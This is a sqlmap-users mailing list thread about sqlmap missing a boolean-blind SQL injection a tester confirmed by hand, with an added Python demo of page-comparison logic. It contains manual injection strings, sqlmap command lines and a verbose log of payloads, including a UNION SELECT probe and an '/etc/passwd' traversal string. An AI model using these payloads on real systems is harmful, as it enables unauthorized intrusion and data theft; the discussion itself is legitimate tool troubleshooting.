Re: [sqlmap-users] Unable to identify injectable parameter in fairly typical boolean-based blind SQ
From: Johnathon D. <hoo...@gm...> - 2015-04-29 14:13:29
Curious, have you tried using the --prefix and --suffix options to frame
your injection to see if that helps?

On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amc...@gm...> wrote:
> OK. You're right in that the following lines in your dummy output
> should produce discernible responses when tested against the
> application:
> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>
> I've verified this manually. Thanks and I'll send you the traffic output
> file.
>
> Cheers,
>
> Alistair.
>
> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar <mir...@gm...> wrote:
> > I would say that you screwed something up. Can you please send that
> > traffic file I requested.
> >
> > Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
> > AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
> > invalid.
> >
> > $ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection --dummy -v 3
> >          _
> >  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
> > |_ -| . | |     | .'| . |
> > |___|_  |_|_|_|_|__,|  _|
> >       |_|           |_|   http://sqlmap.org
> >
> > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> > mutual consent is illegal. It is the end user's responsibility to obey all
> > applicable local, state and federal laws. Developers assume no liability and
> > are not responsible for any misuse or damage caused by this program
> >
> > [*] starting at 08:55:05
> >
> > [08:55:05] [DEBUG] cleaning up configuration parameters
> > [08:55:05] [DEBUG] setting the HTTP timeout
> > [08:55:05] [DEBUG] creating HTTP requests opener object
> > [08:55:05] [DEBUG] heuristically checking if the target is protected by some
> > kind of WAF/IPS/IDS
> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
> > couple of seconds
> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
> > comparison on a sequence matcher. If no dynamic nor injectable parameters
> > are detected, or in case of junk results, refer to user's manual paragraph
> > 'Page comparison' and provide a string or regular expression to match on
> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
> > retry the request
> > [08:55:08] [INFO] searching for dynamic content
> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 2485
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] 8682
> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
> > might not be injectable
> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
> > ...
> >
> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amc...@gm...> wrote:
> >>
> >> Hi Brandon,
> >>
> >> Thanks for your comment. Confirming that I've tried risk=3 with
> >> level=5 with the same results. I've looked more closely at the
> >> requests that sqlmap is sending to check if the parameter is
> >> injectable. It is testing the Sec parameter with values such as:
> >>
> >> PackageSelection) AND 1477=7114
> >> PackageSelection) AND 1631=1631
> >> PackageSelection') AND 5603=7729
> >> PackageSelection') AND 1631=1631
> >> PackageSelection' AND 3943=9381
> >> PackageSelection' AND 1631=1631
> >> PackageSelection" AND 3324=4690
> >> PackageSelection" AND 1631=1631
> >> PackageSelection) AND 4734=6616 AND (6346=6346
> >> PackageSelection)) AND 7350=9272 AND (8861=8861
> >>
> >> When in fact, I assume it would need to use logic like I used to get
> >> distinguishable responses:
> >>
> >> PackageSelection (returns response A)
> >> PackageSelection' AND '1'='1 (returns response A)
> >> PackageSelection' AND '1'='2 (returns response B)
> >>
> >> In a nutshell, it doesn't appear to be trying single quotes and values
> >> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
> >> typical format for checking boolean-based blind SQLi.
> >>
> >> Cheers,
> >>
> >> Alistair.
> >>
> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry <bpe...@gm...> wrote:
> >> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >> >
> >> > Alistair, have you tried --risk=3 with --level=5 yet?
> >> >
> >> > Sent from a phone
> >> >
> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <mir...@gm...> wrote:
> >> >
> >> > Can you please send the unredacted content of request.txt to my address?
> >> >
> >> > If not, then please at least send me the content of traffic file which you
> >> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> >> > run.
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amc...@gm...> wrote:
> >> >>
> >> >> Thanks for the quick reply.
> >> >>
> >> >> The contents of the request file are as follows:
> >> >>
> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> >> Host: <redacted>
> >> >> Accept: */*
> >> >> Accept-Language: en
> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> >> x64; Trident/5.0)
> >> >> Connection: close
> >> >> Referer: <redacted>
> >> >> Cookie: <redacted>
> >> >>
> >> >> I've redacted some of the details as it's not appropriate to draw
> >> >> attention to an internet facing application's SQLi vulnerability.
> >> >>
> >> >> When providing the request file as part of the following command:
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> >> exploit) the boolean-based blind vulnerability which I've verified
> >> >> manually.
> >> >>
> >> >> Thanks again,
> >> >>
> >> >> Al.
> >> >>
> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar <mir...@gm...> wrote:
> >> >> > And what is the content of request file?
> >> >> >
> >> >> > Bye
> >> >> >
> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson <amc...@gm...> wrote:
> >> >> >>
> >> >> >> Hi sqlmappers,
> >> >> >>
> >> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> >> the past. I came across what appeared to be pretty typical boolean-based
> >> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> >> blind SQLi is cumbersome to say the least.
> >> >> >>
> >> >> >> Here is a summary of the requests I've made to manually confirm the
> >> >> >> vulnerability.
> >> >> >>
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
> >> >> >>
> >> >> >> I've tried various sqlmap flags and thought the following command
> >> >> >> would give me the best chance of success:
> >> >> >>
> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> >> 'industries' -v 1
> >> >> >>
> >> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> >> not response B.
> >> >> >>
> >> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> >> this with the AND statement as it should but is not using single
> >> >> >> quotes as per my example above.
> >> >> >>
> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
> >> >> >> more than happy to contribute some time to improve it so it can
> >> >> >> identify injectable parameters such as these in the future.
> >> >> >>
> >> >> >> Thanks,
> >> >> >>
> >> >> >> Al.
> >> >> >>
> >> >> >> _______________________________________________
> >> >> >> sqlmap-users mailing list
> >> >> >> sql...@li...
> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >> >
> >> >> > --
> >> >> > Miroslav Stampar
> >> >> > http://about.me/stamparm
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
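The dummy run in the thread shows the three things a boolean-based blind check depends on: the "target URL is not stable" fallback to a sequence-matcher ratio, the "searching for dynamic content" pass that strips per-request noise, and the fixed match string Alistair supplies with --string 'industries'. The Python below is an added example (not sqlmap's code and not from anyone in the thread) that reproduces that page-comparison logic on constructed pages; the 0.98 threshold, the page markup and the request tokens are assumptions for the demo.

```python
import difflib
import re

RATIO_THRESHOLD = 0.98  # assumption for this demo; sqlmap tunes its own ratio per parameter

def render(condition_true: bool, token: str) -> str:
    """Constructed page: 'industries' shows only when the injected condition is
    true; token stands in for a per-response CSRF/session value (dynamic content)."""
    body = ("<p>We serve the following industries: retail, energy.</p>"
            if condition_true else "<p>No such section.</p>")
    return "\n".join([
        "<html><head>",
        f"<meta name='request-token' content='{token}'>",
        "</head><body><h1>User Guide</h1>",
        body,
        f"<footer>generated for {token}</footer></body></html>",
    ])

def ratio(a: str, b: str) -> float:
    return difflib.SequenceMatcher(None, a, b, autojunk=False).ratio()

def find_dynamic(page_a: str, page_b: str, ctx: int = 10) -> list:
    """Diff two fetches of the unmodified URL and keep the static text on either
    side of every region that changed (the 'searching for dynamic content' step)."""
    sm = difflib.SequenceMatcher(None, page_a, page_b, autojunk=False)
    return [(page_a[max(0, i1 - ctx):i1], page_a[i2:i2 + ctx])
            for tag, i1, i2, _, _ in sm.get_opcodes() if tag != "equal"]

def remove_dynamic(page: str, markers: list) -> str:
    """Drop whatever sits between each recorded prefix/suffix pair."""
    for prefix, suffix in markers:
        page = re.sub(re.escape(prefix) + r".*?" + re.escape(suffix),
                      prefix + suffix, page, flags=re.S)
    return page

def ratio_verdict(baseline: str, true_page: str, false_page: str) -> bool:
    """Sequence-matcher rule: TRUE page still matches the baseline, FALSE page does not."""
    return (ratio(baseline, true_page) >= RATIO_THRESHOLD
            and ratio(baseline, false_page) < RATIO_THRESHOLD)

def string_verdict(baseline: str, true_page: str, false_page: str, needle: str) -> bool:
    """--string rule: needle present on the TRUE page, absent on the FALSE page."""
    return needle in baseline and needle in true_page and needle not in false_page

if __name__ == "__main__":
    base1, base2 = render(True, "a1b2c3d4"), render(True, "z9y8x7w6")
    t_page, f_page = render(True, "m7n8o9p0"), render(False, "e5f6g7h8")
    print("raw ratio:", ratio_verdict(base1, t_page, f_page))  # False: tokens sink the ratio
    cleaned = [remove_dynamic(p, find_dynamic(base1, base2)) for p in (base1, t_page, f_page)]
    print("stripped ratio:", ratio_verdict(*cleaned), "| --string:", string_verdict(base1, t_page, f_page, "industries"))  # True True
```

The raw ratio misses the injection because the two changing tokens alone push the TRUE page below the threshold, which is the situation the "heavily dynamic" warning describes; either stripping the dynamic regions first or anchoring on a string that only the TRUE response contains restores a clean verdict.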